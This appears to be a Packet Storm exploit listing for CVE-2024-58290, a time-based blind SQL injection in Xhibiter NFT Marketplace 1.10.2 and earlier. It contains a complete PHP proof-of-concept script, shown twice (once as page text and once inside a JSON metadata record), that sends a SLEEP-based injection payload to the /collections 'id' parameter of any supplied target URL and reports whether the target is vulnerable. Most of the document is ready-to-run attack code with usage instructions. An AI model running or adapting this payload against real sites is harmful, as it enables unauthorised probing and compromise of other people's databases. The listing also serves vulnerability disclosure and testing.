📄 Xhibiter NFT Marketplace 1.10.2 SQL Injection_PACKETSTORM:215056

9.3 / 10

CRITICAL

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:H/SI:N/VA:N/SA:N

Description

Xhibiter NFT Marketplace versions 1.10.2 and below suffer from a time-based remote blind SQL injection vulnerability in the id parameter of the /collections endpoint...

Visit Original Source

Basic Information

ID PACKETSTORM:215056

Published Feb 6, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Xhibiter NFT Marketplace <= 1.10.2 Unauthenticated Time-Based SQL Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://themeforest.net/item/xhibiter-nft-marketplace-html-template/36542347 |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214186/ & CVE-2024-58290

[+] Summary : A time-based blind SQL injection vulnerability exists in the "id" parameter of the /collections endpoint in Xhibiter NFT Marketplace. An unauthenticated
attacker can inject arbitrary SQL queries, leading to database interaction confirmation via delay-based payloads.

[+] Usage : php poc.php --url=http://target/xhibiter

[+] POC :

<?php

if (php_sapi_name() !== 'cli') {
die("Run this script from CLI only.\n");
}

function banner() {
echo "
##########################################################
# CVE-2024-58290 - Xhibiter SQL Injection Detector #
# PHP Poc by indoushka #
##########################################################
";
}

function checkVulnerability($baseUrl) {

$endpoint = rtrim($baseUrl, '/') . "/collections";

// Time-Based SQL Injection Payload
$payload = "1' AND (SELECT 5678 FROM (SELECT(SLEEP(5)))DwVr) AND '1'='1";

$query = http_build_query([
'id' => $payload
]);

$url = $endpoint . "?" . $query;

echo "[*] Target URL: {$endpoint}\n";
echo "[*] Testing for SQL Injection (Time-Based)...\n";

$start = microtime(true);

$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 15,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);

curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);

$end = microtime(true);
$duration = $end - $start;

if ($error) {
echo "[!] CURL Error: {$error}\n";
return;
}

if ($duration >= 5) {
echo "\n[+] SUCCESS: Target is VULNERABLE to CVE-2024-58290\n";
echo "[+] Response delay: " . round($duration, 2) . " seconds\n";
echo "[+] Database executed SLEEP(5)\n";
} else {
echo "\n[-] FAILED: Target does not appear vulnerable\n";
echo "[-] Response time: " . round($duration, 2) . " seconds\n";
}
}

$options = getopt("", ["url:"]);

if (!isset($options['url'])) {
echo "Usage: php poc.php --url=http://target/xhibiter\n";
exit;
}

banner();
checkVulnerability($options['url']);

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================

{
    "lastseen": "2026-02-06T18:16:36",
    "description": "Xhibiter NFT Marketplace versions 1.10.2 and below suffer from a time-based remote blind SQL injection vulnerability in the id parameter of the /collections endpoint...",
    "published": "2026-02-06T00:00:00",
    "modified": "2026-02-06T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Xhibiter NFT Marketplace 1.10.2 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215056",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2024-58290"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Xhibiter NFT Marketplace <= 1.10.2 Unauthenticated Time-Based SQL Injection                                                 |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\n    | # Vendor    : https://themeforest.net/item/xhibiter-nft-marketplace-html-template/36542347                                                |\n    =============================================================================================================================================\n    \n    [+] References :  https://packetstorm.news/files/id/214186/ & CVE-2024-58290\n    \n    [+] Summary    :  A time-based blind SQL injection vulnerability exists in the \"id\" parameter of the /collections endpoint in Xhibiter NFT Marketplace. An unauthenticated\n                      attacker can inject arbitrary SQL queries, leading to database interaction confirmation via delay-based payloads.\n    \n    \n    [+] Usage : php poc.php --url=http://target/xhibiter\n    \n    [+] POC :\n    \n    <?php\n    \n    \n    if (php_sapi_name() !== 'cli') {\n        die(\"Run this script from CLI only.\\n\");\n    }\n    \n    function banner() {\n        echo \"\n    ##########################################################\n    #   CVE-2024-58290 - Xhibiter SQL Injection Detector     #\n    #                PHP Poc by indoushka                    #\n    ##########################################################\n    \";\n    }\n    \n    function checkVulnerability($baseUrl) {\n    \n        $endpoint = rtrim($baseUrl, '/') . \"/collections\";\n    \n        // Time-Based SQL Injection Payload\n        $payload = \"1' AND (SELECT 5678 FROM (SELECT(SLEEP(5)))DwVr) AND '1'='1\";\n    \n        $query = http_build_query([\n            'id' => $payload\n        ]);\n    \n        $url = $endpoint . \"?\" . $query;\n    \n        echo \"[*] Target URL: {$endpoint}\\n\";\n        echo \"[*] Testing for SQL Injection (Time-Based)...\\n\";\n    \n        $start = microtime(true);\n    \n        $ch = curl_init();\n        curl_setopt_array($ch, [\n            CURLOPT_URL => $url,\n            CURLOPT_RETURNTRANSFER => true,\n            CURLOPT_TIMEOUT => 15,\n            CURLOPT_SSL_VERIFYPEER => false,\n            CURLOPT_SSL_VERIFYHOST => false\n        ]);\n    \n        curl_exec($ch);\n        $error = curl_error($ch);\n        curl_close($ch);\n    \n        $end = microtime(true);\n        $duration = $end - $start;\n    \n        if ($error) {\n            echo \"[!] CURL Error: {$error}\\n\";\n            return;\n        }\n    \n        if ($duration >= 5) {\n            echo \"\\n[+] SUCCESS: Target is VULNERABLE to CVE-2024-58290\\n\";\n            echo \"[+] Response delay: \" . round($duration, 2) . \" seconds\\n\";\n            echo \"[+] Database executed SLEEP(5)\\n\";\n        } else {\n            echo \"\\n[-] FAILED: Target does not appear vulnerable\\n\";\n            echo \"[-] Response time: \" . round($duration, 2) . \" seconds\\n\";\n        }\n    }\n    \n    $options = getopt(\"\", [\"url:\"]);\n    \n    if (!isset($options['url'])) {\n        echo \"Usage: php poc.php --url=http://target/xhibiter\\n\";\n        exit;\n    }\n    \n    banner();\n    checkVulnerability($options['url']);\n    \n    \t\n    Greetings to :============================================================\n    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\n    ==========================================================================",
    "sourceHref": "https://packetstorm.news/download/215056",
    "cvss": {
        "score": 9.3,
        "severity": "CRITICAL",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:H/SI:N/VA:N/SA:N",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215056/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply